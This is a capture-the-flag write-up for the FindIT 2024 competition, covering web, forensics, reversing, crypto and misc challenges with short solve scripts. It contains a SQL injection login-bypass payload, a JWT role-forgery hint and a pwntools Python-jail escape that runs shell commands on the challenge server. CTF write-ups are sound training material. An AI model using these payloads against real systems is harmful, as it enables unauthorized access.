> For the complete documentation index, see [llms.txt](https://n2l-cysec.gitbook.io/notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://n2l-cysec.gitbook.io/notes/writeup-ctfs/2024/findit-2024.md). # FindIT 2024 playing solo as N2L team | Chall | Category | | | ---------------------------------------------- | -------- | - | | [#kue](#kue "mention") | web | | | [#login-dulu](#login-dulu "mention") | web | | | [#bagas-dribble](#bagas-dribble "mention") | forensic | | | [#file-kosong](#file-kosong "mention") | forensic | | | [#image-cropper](#image-cropper "mention") | forensic | | | [#is\_this\_python](#is_this_python "mention") | reverse | | | [#how-to-decrypte](#how-to-decrypte "mention") | crypto | | | [#your-journey](#your-journey "mention") | misc | | | [#neobim](#neobim "mention") | misc | | ## Kue concept: basic jwt webex tinggal edit rolesnya dgn secret your\_secret gnti jadi admin ## login-dulu concept: sqli we must suply username admin and bypass the password Username: admin Password: " union select rootpage, type, name from sqlite\_master -- reff : ## bagas-dribble concept: basic stego tinggal strings nemu flagnya ## file kosong foren/file kosong concept : finding pattern ```python s = """Hex FIlenya taruh sini""" s = s.replace('E2 80 83', '0').replace('20', '1').replace(' ', '') for i in range(0, len(s), 8): print(chr(int(s[i:i+8], 2)), end='') ``` ## image cropper concept : recover image from wav lsb decoding ```python import argparse from PIL import Image import numpy as np import scipy.io.wavfile as wavfile import base64 def restore_image(wav_input_path): # Read the WAV file sample_rate, audio_signal = wavfile.read(wav_input_path) # Extract red, green, and blue channels from the audio signal red_channel = audio_signal[::3] green_channel = audio_signal[1::3] blue_channel = audio_signal[2::3] # Reshape and normalize the channels red_channel = ((red_channel + 1) / 2 * 255).astype(np.uint8) green_channel = ((green_channel + 1) / 2 * 255).astype(np.uint8) blue_channel = ((blue_channel + 1) / 2 * 255).astype(np.uint8) # Combine channels to reconstruct the image image_size = int(np.sqrt(len(red_channel))) image_data = np.column_stack((red_channel, green_channel, blue_channel)).reshape((image_size, image_size, 3)) # Save the image restored_image = Image.fromarray(image_data, 'RGB') pixels = list(restored_image.getdata()) # pixelss = [] # for i in range(len(pixels)): # pixelss.append((pixels[i][0]+1,pixels[i][1]+1,pixels[i][1]+2)) x = "" cc = 0 for i in pixels: if i[0] == 11 and i[0] % 2 == 1: x += "0" elif i[0] == 13 and i[0] % 2 == 1: x+="1" else: x+="1" if i[1] == 11 and i[1] % 2 == 1: x+="0" elif i[1] == 12 and i[1] % 2 == 1: x+="1" else: x+="1" if i[2] == 12 and i[2] % 2 == 0: x+="0" elif i[2] == 14 and i[2] % 2 == 0: x+="1" else: x+="1" if cc == 250: print(x) cc+=1 print("Image restored successfully!") if __name__ == "__main__": restore_image("encoded.wav") ``` ## is\_this\_python concept : reversing pyc ```python # Define a key key = '2024' + 'findit' # Initialize an empty list to store the encoded flag flag_enc = [113, 100, 116, 79, 4, 89, 2, 80, 54, 66, 83, 92, 3, 107, 8, 80, 9, 11, 54, 16, 93, 1, 83, 90, 82, 7, 49, 80, 80, 71, 10, 1, 1, 73] # Initialize an empty list to store the key characters key_arr = [] # Extract characters from the key and append their ASCII values to key_arr for character in key: character = ord(character) key_arr.append(character) # Initialize an empty list to store the flag in decimal form flag_arr = [] # Convert hexadecimal values to decimal and append them to flag_arr for hex_val in flag_enc: hex_val = int(hex_val) flag_arr.append(hex_val) # Extend key_arr if its length is less than flag_arr while len(flag_arr) > len(key_arr): key_arr.extend(key_arr) # Initialize an empty list to store the flag in decimal form after XOR operation flag_dec = [] # Perform XOR operation between corresponding elements of key_arr and flag_arr for k, f in zip(key_arr, flag_arr): xored = k ^ f flag_dec.append(xored) # Convert the decimal values to text characters flag_dec_text = ''.join(map(chr, flag_dec)) # Print the result print(flag_dec_text) ``` ## your-journey concept : pyjail restriction bypass using unique char ```python from pwn import * context.log_level="ERROR" io = remote("103.191.63.187", 1337) # Change IP and PORT io.sendlineafter(b"$ ", '𝘣𝘳𝘦𝘢𝘬𝘱𝘰𝘪𝘯𝘵'.encode()) io.sendlineafter(b"(Pdb) ",b"import os;os.system('grep -ra \"FindIT\"')") print(io.recv().decode()) ``` ## how to decrypte? ```python def caesar_decrypt(ciphertext): plaintext = "" for char in ciphertext: if char.isalpha(): ascii_offset = ord('A') if char.isupper() else ord('a') decrypted_char = chr((ord(char) - ascii_offset - 4) % 26 + ascii_offset) plaintext += decrypted_char else: plaintext += char return plaintext print(caesar_decrypt("JmrhMXGXJ{al4x_h03w_G43w4v_Hs_57lnkrzh8x5}")) ``` ## neobim ```python import httpx URL = "https://discordapp.com/" class BaseAPI: def __init__(self, url=URL) -> None: self.c = httpx.Client(base_url=url, follow_redirects=True) def get_assets(self, appid): return self.c.get(f"/api/oauth2/applications/{appid}/assets") def get_asset(self, appid, assetid): return self.c.get(f"https://cdn.discordapp.com/app-assets/{appid}/{assetid}.png") class API(BaseAPI): ... if __name__ == "__main__": api = API() appid = "1233467180696207390" res = api.get_assets(appid) for asset in res.json(): res = api.get_asset(appid, asset["id"]) with open(asset["name"]+".png", "wb") as f: f.write(res.content) ``` get the appid in the readme --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://n2l-cysec.gitbook.io/notes/writeup-ctfs/2024/findit-2024.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.